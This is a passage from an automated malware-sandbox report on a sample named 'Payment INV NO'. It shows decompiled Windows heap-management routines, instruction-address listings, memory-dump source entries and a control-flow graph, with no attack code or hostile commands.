					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E017D9730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							L0185A80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E017D9660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								L0185138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								L0184FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							L0185A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											L0185A80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E017B7D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												L01851582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E017B7D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												L01851582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E017BB73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E017BBC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								L0185A80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}





















































                                                          0x017bb486
                                                          0x017bb48a
                                                          0x017bb48e
                                                          0x017bb491
                                                          0x017bb493
                                                          0x017bb49a
                                                          0x017bb49c
                                                          0x017bb4a2
                                                          0x017bb4a7
                                                          0x017bb6fc
                                                          0x017bb6fc
                                                          0x017bb6b3
                                                          0x017bb6c3
                                                          0x017bb6c3
                                                          0x017bb4b4
                                                          0x0180294f
                                                          0x01802951
                                                          0x01802957
                                                          0x0180295d
                                                          0x01802961
                                                          0x01802980
                                                          0x01802985
                                                          0x01802963
                                                          0x01802978
                                                          0x0180297d
                                                          0x0180298b
                                                          0x01802990
                                                          0x01802995
                                                          0x0180299d
                                                          0x018029a1
                                                          0x018029a2
                                                          0x018029a2
                                                          0x018029a7
                                                          0x018029a7
                                                          0x01802951
                                                          0x017bb4ba
                                                          0x017bb4ba
                                                          0x017bb4bd
                                                          0x017bb4c2
                                                          0x017bb6d4
                                                          0x017bb4c8
                                                          0x017bb4c8
                                                          0x017bb4c8
                                                          0x017bb4cd
                                                          0x017bb4d0
                                                          0x017bb4d9
                                                          0x017bb4df
                                                          0x017bb4e2
                                                          0x018029b7
                                                          0x018029bd
                                                          0x00000000
                                                          0x017bb4e8
                                                          0x017bb4e8
                                                          0x017bb4ef
                                                          0x017bb4fa
                                                          0x017bb703
                                                          0x017bb709
                                                          0x017bb70b
                                                          0x017bb711
                                                          0x017bb711
                                                          0x017bb70b
                                                          0x017bb503
                                                          0x017bb50c
                                                          0x017bb511
                                                          0x017bb514
                                                          0x017bb519
                                                          0x018029c5
                                                          0x018029c7
                                                          0x018029cc
                                                          0x018029cd
                                                          0x018029cf
                                                          0x018029d0
                                                          0x018029d2
                                                          0x018029d7
                                                          0x018029d9
                                                          0x018029ee
                                                          0x018029ee
                                                          0x018029f4
                                                          0x018029fa
                                                          0x01802a01
                                                          0x00000000
                                                          0x01802a01
                                                          0x018029db
                                                          0x018029df
                                                          0x00000000
                                                          0x00000000
                                                          0x018029e1
                                                          0x018029e4
                                                          0x00000000
                                                          0x00000000
                                                          0x018029e6
                                                          0x018029e6
                                                          0x017bb51f
                                                          0x017bb51f
                                                          0x017bb520
                                                          0x017bb525
                                                          0x017bb52b
                                                          0x017bb52d
                                                          0x017bb52e
                                                          0x017bb530
                                                          0x017bb535
                                                          0x017bb53b
                                                          0x017bb53d
                                                          0x01802a07
                                                          0x00000000
                                                          0x01802a07
                                                          0x017bb549
                                                          0x017bb54e
                                                          0x01802a12
                                                          0x01802a15
                                                          0x00000000
                                                          0x00000000
                                                          0x01802a24
                                                          0x017bb559
                                                          0x017bb55c
                                                          0x01802a34
                                                          0x01802a3b
                                                          0x01802a4d
                                                          0x01802a4d
                                                          0x01802a3b
                                                          0x017bb566
                                                          0x017bb56b
                                                          0x017bb56f
                                                          0x017bb57b
                                                          0x017bb582
                                                          0x01802a57
                                                          0x01802a5c
                                                          0x01802a5c
                                                          0x017bb582
                                                          0x017bb58b
                                                          0x017bb58e
                                                          0x017bb592
                                                          0x017bb596
                                                          0x017bb599
                                                          0x017bb59b
                                                          0x017bb59e
                                                          0x017bb5a3
                                                          0x017bb5a6
                                                          0x017bb5a9
                                                          0x01802a66
                                                          0x01802a67
                                                          0x01802a73
                                                          0x01802a78
                                                          0x017bb5b8
                                                          0x017bb5b8
                                                          0x017bb5bb
                                                          0x017bb5bd
                                                          0x017bb5bd
                                                          0x017bb5c4
                                                          0x017bb5f7
                                                          0x017bb5f7
                                                          0x017bb600
                                                          0x017bb606
                                                          0x017bb60c
                                                          0x017bb612
                                                          0x017bb618
                                                          0x017bb621
                                                          0x017bb623
                                                          0x017bb629
                                                          0x017bb629
                                                          0x017bb62c
                                                          0x017bb62f
                                                          0x017bb633
                                                          0x017bb636
                                                          0x017bb639
                                                          0x017bb71d
                                                          0x017bb720
                                                          0x017bb736
                                                          0x017bb660
                                                          0x017bb660
                                                          0x017bb662
                                                          0x017bb665
                                                          0x017bb66a
                                                          0x017bb6e6
                                                          0x017bb6e7
                                                          0x017bb6ea
                                                          0x017bb6ef
                                                          0x01802ad1
                                                          0x01802ad2
                                                          0x01802ad8
                                                          0x01802add
                                                          0x01802add
                                                          0x017bb6f5
                                                          0x017bb6f5
                                                          0x017bb672
                                                          0x017bb675
                                                          0x017bb67a
                                                          0x01802ae5
                                                          0x01802ae8
                                                          0x00000000
                                                          0x00000000
                                                          0x01802af4
                                                          0x01802afc
                                                          0x00000000
                                                          0x017bb680
                                                          0x017bb680
                                                          0x017bb680
                                                          0x017bb685
                                                          0x017bb687
                                                          0x017bb68a
                                                          0x01802b06
                                                          0x01802b0c
                                                          0x01802b13
                                                          0x01802b1e
                                                          0x01802b20
                                                          0x01802b2b
                                                          0x01802b2b
                                                          0x01802b2b
                                                          0x01802b34
                                                          0x01802b45
                                                          0x01802b45
                                                          0x01802b13
                                                          0x017bb696
                                                          0x017bb69b
                                                          0x017bb6a0
                                                          0x01802b4f
                                                          0x01802b52
                                                          0x00000000
                                                          0x00000000
                                                          0x01802b61
                                                          0x00000000
                                                          0x017bb6a6
                                                          0x017bb6a6
                                                          0x017bb6a6
                                                          0x017bb6a8
                                                          0x017bb6ab
                                                          0x01802b70
                                                          0x01802b72
                                                          0x01802b7d
                                                          0x01802b7d
                                                          0x01802b7d
                                                          0x01802b86
                                                          0x01802b97
                                                          0x01802b97
                                                          0x017bb6b1
                                                          0x00000000
                                                          0x017bb6b1
                                                          0x017bb6a0
                                                          0x017bb67a
                                                          0x017bb722
                                                          0x017bb722
                                                          0x017bb655
                                                          0x017bb65d
                                                          0x00000000
                                                          0x017bb5c6
                                                          0x017bb5c6
                                                          0x017bb5ce
                                                          0x01802a83
                                                          0x01802a97
                                                          0x01802a97
                                                          0x01802a9a
                                                          0x00000000
                                                          0x00000000
                                                          0x01802a88
                                                          0x01802a8a
                                                          0x01802a8c
                                                          0x01802a8f
                                                          0x01802a92
                                                          0x01802aa1
                                                          0x01802aa1
                                                          0x01802aa2
                                                          0x01802aab
                                                          0x01802ab0
                                                          0x00000000
                                                          0x01802ab0
                                                          0x01802a94
                                                          0x01802a94
                                                          0x00000000
                                                          0x01802a9c
                                                          0x017bb5d4
                                                          0x017bb5d4
                                                          0x017bb5d6
                                                          0x017bb5d9
                                                          0x017bb5de
                                                          0x017bb5e1
                                                          0x017bb5e4
                                                          0x01802ab8
                                                          0x01802ab9
                                                          0x01802ac4
                                                          0x01802ac9
                                                          0x017bb5f2
                                                          0x017bb5f2
                                                          0x017bb5f4
                                                          0x017bb5f4
                                                          0x00000000
                                                          0x017bb5e4
                                                          0x017bb5c4
                                                          0x017bb554
                                                          0x017bb554
                                                          0x00000000
                                                          0x017bb554

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-3616360210
                                                          • Opcode ID: 4b5454c792b57ed8c4fa56ab8f693b28712f55a223925d19bb3fcd6981e5504b
                                                          • Instruction ID: 5f3f6d205ba78c4f923842c20c8f90f50a535247cda2df9ceb57f1ba789a9f90
                                                          • Opcode Fuzzy Hash: 4b5454c792b57ed8c4fa56ab8f693b28712f55a223925d19bb3fcd6981e5504b
                                                          • Instruction Fuzzy Hash: 26E17C70600609DFDB1ACF68C898BAABBB6FF44304F244199E916DB291D774EA81CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01792FB0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 262timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1105 1792fb0-1792fce 1106 17efb7d-17efb84 1105->1106 1107 1792fd4-1792fdb 1105->1107 1108 17930ea 1106->1108 1109 17efb8a-17efb94 GetPEB 1106->1109 1110 1792fe1-1792fe8 1107->1110 1111 17efbe3-17efbed GetPEB 1107->1111 1118 17930ec-17930fd call 17db640 1108->1118 1114 17efb96-17efbb1 GetPEB call 179b150 1109->1114 1115 17efbb3-17efbb8 call 179b150 1109->1115 1116 17efc2d-17efc3e RtlDebugPrintTimes 1110->1116 1117 1792fee-1792ff5 1110->1117 1112 179312b-179312d 1111->1112 1113 17efbf3-17efbfa 1111->1113 1112->1118 1119 17efbfc-17efc00 1113->1119 1120 17efc07-17efc28 call 17931b0 call 17c1249 1113->1120 1126 17efbbd-17efbd0 call 179b150 1114->1126 1115->1126 1116->1118 1122 1792ffb-1793009 call 17931b0 1117->1122 1123 17efc43-17efc4e 1117->1123 1119->1120 1120->1108 1136 179300f-1793018 GetPEB 1122->1136 1137 17efc53-17efc5a 1122->1137 1123->1137 1126->1108 1140 17efbd6-17efbde 1126->1140 1136->1112 1139 179301e-1793030 call 17c1249 1136->1139 1137->1136 1141 17efc60-17efc69 1137->1141 1149 1793032-1793034 1139->1149 1140->1108 1141->1112 1150 17efc6f 1141->1150 1152 179303a-1793041 1149->1152 1153 17efc74-17efc9f call 17c174b call 17b7d50 1149->1153 1150->1136 1155 1793100-1793106 1152->1155 1156 1793047 1152->1156 1166 17efcb1 1153->1166 1167 17efca1-17efcaf GetPEB 1153->1167 1158 1793049-179304b 1155->1158 1156->1158 1160 179310b-1793126 call 17c174b 1158->1160 1161 1793051-1793059 1158->1161 1160->1161 1164 179305f-1793063 1161->1164 1165 17efcd5-17efcea call 17c174b 1161->1165 1169 179307b-179308d call 1793138 1164->1169 1170 1793065-1793068 1164->1170 1182 17efcf1-17efcfa GetPEB 1165->1182 1172 17efcb6-17efcb9 1166->1172 1167->1172 1181 179308f-17930a0 call 17b7d50 1169->1181 1173 179306a-1793070 call 17ca080 1170->1173 1174 1793075 1170->1174 1178 17efcca-17efcd0 1172->1178 1179 17efcbb-17efcc3 1172->1179 1173->1174 1174->1169 1178->1149 1179->1178 1181->1182 1188 17930a6-17930ab 1181->1188 1184 17efd01-17efd0e GetPEB 1182->1184 1186 17930b1-17930c2 call 17b7d50 1184->1186 1187 17efd14-17efd1b call 17b7d50 1184->1187 1195 17930c8-17930cd 1186->1195 1196 17efd52-17efd5b GetPEB 1186->1196 1193 17efd1d-17efd26 GetPEB 1187->1193 1194 17efd28-17efd4d call 17d9ae0 1187->1194 1188->1184 1188->1186 1193->1194 1194->1186 1198 17930d3-17930da call 17b7d50 1195->1198 1199 17efd62-17efd69 call 17b7d50 1195->1199 1196->1199 1205 17930e0-17930e8 1198->1205 1206 17efda0-17efda9 GetPEB 1198->1206 1207 17efd6b-17efd74 GetPEB 1199->1207 1208 17efd76-17efd9b call 17d9ae0 1199->1208 1205->1108 1209 179312f-1793136 1205->1209 1207->1208 1208->1206 1209->1108
                                                          C-Code - Quality: 69%
                                                          			E01792FB0(intOrPtr* _a4) {
				signed int _v8;
				void* _v36;
				void* _v62;
				void* _v68;
				void* _v72;
				signed int _v96;
				void* _v98;
				char _v100;
				void* _v104;
				void* _v108;
				void* _v112;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t62;
				intOrPtr _t64;
				signed int* _t83;
				signed int _t84;
				signed int _t88;
				char* _t89;
				char _t93;
				void* _t99;
				signed int* _t102;
				intOrPtr _t103;
				void* _t104;
				signed int* _t107;
				signed int _t108;
				char* _t115;
				signed int _t118;
				signed int _t124;
				void* _t125;
				void* _t126;
				signed int _t127;
				intOrPtr* _t128;
				void* _t135;
				intOrPtr _t137;
				intOrPtr* _t159;
				void* _t160;
				void* _t162;
				intOrPtr* _t164;
				void* _t167;
				signed int* _t168;
				signed int* _t169;
				signed int _t172;
				signed int _t174;

				_t174 = (_t172 & 0xfffffff8) - 0x64;
				_v8 =  *0x188d360 ^ _t174;
				_push(_t125);
				_t159 = _a4;
				if(_t159 == 0) {
					__eflags =  *0x1888748 - 2;
					if( *0x1888748 >= 2) {
						_t64 =  *[fs:0x30];
						__eflags =  *(_t64 + 0xc);
						if( *(_t64 + 0xc) == 0) {
							_push("HEAP: ");
							E0179B150();
						} else {
							E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(0x178d2f4);
						E0179B150();
						__eflags =  *0x1887bc8;
						if(__eflags == 0) {
							_t135 = 2;
							L01852073(_t125, _t135, _t159, __eflags);
						}
					}
					L26:
					_t62 = 0;
					L27:
					_pop(_t160);
					_pop(_t162);
					_pop(_t126);
					return E017DB640(_t62, _t126, _v8 ^ _t174, _t155, _t160, _t162);
				}
				if( *((intOrPtr*)(_t159 + 8)) == 0xddeeddee) {
					_t137 =  *[fs:0x30];
					__eflags = _t159 -  *((intOrPtr*)(_t137 + 0x18));
					if(_t159 ==  *((intOrPtr*)(_t137 + 0x18))) {
						L30:
						_t62 = _t159;
						goto L27;
					}
					_t138 =  *(_t159 + 0x20);
					__eflags =  *(_t159 + 0x20);
					if( *(_t159 + 0x20) != 0) {
						_t155 = _t159;
						L0183CB1E(_t138, _t159, 0, 8, 0);
					}
					E017931B0(_t125, _t159, _t155);
					L0185274F(_t159);
					_t155 = 1;
					E017C1249(_t159, 1, 0, 0);
					L0185B581(_t159);
					goto L26;
				}
				if(( *(_t159 + 0x44) & 0x01000000) != 0) {
					_t164 =  *0x1885718; // 0x0
					 *0x188b1e0(_t159);
					_t62 =  *_t164();
					goto L27;
				}
				_t144 =  *((intOrPtr*)(_t159 + 0x58));
				if( *((intOrPtr*)(_t159 + 0x58)) != 0) {
					_t155 = _t159;
					L0183CB1E(_t144, _t159, 0, 8, 0);
				}
				E017931B0(_t125, _t159, _t155);
				if(( *(_t159 + 0x40) & 0x61000000) != 0) {
					__eflags =  *(_t159 + 0x40) & 0x10000000;
					if(( *(_t159 + 0x40) & 0x10000000) != 0) {
						goto L5;
					}
					_t124 = L01853518(_t159);
					__eflags = _t124;
					if(_t124 == 0) {
						goto L30;
					}
					goto L5;
				} else {
					L5:
					if(_t159 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
						goto L30;
					} else {
						_t155 = 1;
						E017C1249(_t159, 1, 0, 0);
						_t83 = _t159 + 0x9c;
						_t127 =  *_t83;
						while(_t83 != _t127) {
							_t84 = _t127;
							_t155 =  &_v96;
							_t127 =  *_t127;
							_v96 = _t84 & 0xffff0000;
							_v100 = 0;
							E017C174B( &_v96,  &_v100, 0x8000);
							_t88 = E017B7D50();
							__eflags = _t88;
							if(_t88 == 0) {
								_t89 = 0x7ffe0388;
							} else {
								_t89 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							}
							__eflags =  *_t89;
							if(__eflags != 0) {
								_t155 = _v96;
								L0184FE3F(_t127, _t159, _v96, _v100);
							}
							_t83 = _t159 + 0x9c;
						}
						if( *((char*)(_t159 + 0xda)) == 2) {
							_t93 =  *((intOrPtr*)(_t159 + 0xd4));
						} else {
							_t93 = 0;
						}
						if(_t93 != 0) {
							 *((intOrPtr*)(_t174 + 0x1c)) = _t93;
							_t155 = _t174 + 0x1c;
							 *((intOrPtr*)(_t174 + 0x1c)) = 0;
							E017C174B(_t174 + 0x1c, _t174 + 0x1c, 0x8000);
						}
						_t128 = _t159 + 0x88;
						if( *_t128 != 0) {
							 *((intOrPtr*)(_t174 + 0x24)) = 0;
							_t155 = _t128;
							E017C174B(_t128, _t174 + 0x24, 0x8000);
							 *_t128 = 0;
						}
						if(( *(_t159 + 0x40) & 0x00000001) == 0) {
							 *((intOrPtr*)(_t159 + 0xc8)) = 0;
						}
						goto L16;
						L16:
						_t167 =  *((intOrPtr*)(_t159 + 0xa8)) - 0x10;
						E01793138(_t167);
						if(_t167 != _t159) {
							goto L16;
						} else {
							_t99 = E017B7D50();
							_t168 = 0x7ffe0380;
							if(_t99 != 0) {
								_t102 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t102 = 0x7ffe0380;
							}
							if( *_t102 != 0) {
								_t103 =  *[fs:0x30];
								__eflags =  *(_t103 + 0x240) & 0x00000001;
								if(( *(_t103 + 0x240) & 0x00000001) != 0) {
									_t118 = E017B7D50();
									__eflags = _t118;
									if(_t118 != 0) {
										_t168 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags = _t168;
									}
									 *((short*)(_t174 + 0x2a)) = 0x1023;
									_push(_t174 + 0x24);
									_push(4);
									_push(0x402);
									_push( *_t168 & 0x000000ff);
									 *((intOrPtr*)(_t174 + 0x54)) = _t159;
									E017D9AE0();
								}
							}
							_t104 = E017B7D50();
							_t169 = 0x7ffe038a;
							if(_t104 != 0) {
								_t107 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t107 = 0x7ffe038a;
							}
							if( *_t107 != 0) {
								_t108 = E017B7D50();
								__eflags = _t108;
								if(_t108 != 0) {
									_t169 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t169;
								}
								 *((short*)(_t174 + 0x4e)) = 0x1023;
								_push(_t174 + 0x48);
								_push(4);
								_push(0x402);
								_push( *_t169 & 0x000000ff);
								 *((intOrPtr*)(_t174 + 0x78)) = _t159;
								E017D9AE0();
							}
							if(E017B7D50() != 0) {
								_t115 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							} else {
								_t115 = 0x7ffe0388;
							}
							if( *_t115 != 0) {
								L0184FDD3(_t159);
							}
							goto L26;
						}
					}
				}
			}


















































                                                          0x01792fb8
                                                          0x01792fc2
                                                          0x01792fc6
                                                          0x01792fc9
                                                          0x01792fce
                                                          0x017efb7d
                                                          0x017efb84
                                                          0x017efb8a
                                                          0x017efb90
                                                          0x017efb94
                                                          0x017efbb3
                                                          0x017efbb8
                                                          0x017efb96
                                                          0x017efbab
                                                          0x017efbb0
                                                          0x017efbbe
                                                          0x017efbc3
                                                          0x017efbc8
                                                          0x017efbd0
                                                          0x017efbd8
                                                          0x017efbd9
                                                          0x017efbd9
                                                          0x017efbd0
                                                          0x017930ea
                                                          0x017930ea
                                                          0x017930ec
                                                          0x017930f0
                                                          0x017930f1
                                                          0x017930f2
                                                          0x017930fd
                                                          0x017930fd
                                                          0x01792fdb
                                                          0x017efbe3
                                                          0x017efbea
                                                          0x017efbed
                                                          0x0179312b
                                                          0x0179312b
                                                          0x00000000
                                                          0x0179312b
                                                          0x017efbf3
                                                          0x017efbf8
                                                          0x017efbfa
                                                          0x017efc00
                                                          0x017efc02
                                                          0x017efc02
                                                          0x017efc09
                                                          0x017efc10
                                                          0x017efc1b
                                                          0x017efc1c
                                                          0x017efc23
                                                          0x00000000
                                                          0x017efc23
                                                          0x01792fe8
                                                          0x017efc2d
                                                          0x017efc36
                                                          0x017efc3c
                                                          0x00000000
                                                          0x017efc3c
                                                          0x01792fee
                                                          0x01792ff5
                                                          0x017efc47
                                                          0x017efc49
                                                          0x017efc49
                                                          0x01792ffd
                                                          0x01793009
                                                          0x017efc53
                                                          0x017efc5a
                                                          0x00000000
                                                          0x00000000
                                                          0x017efc62
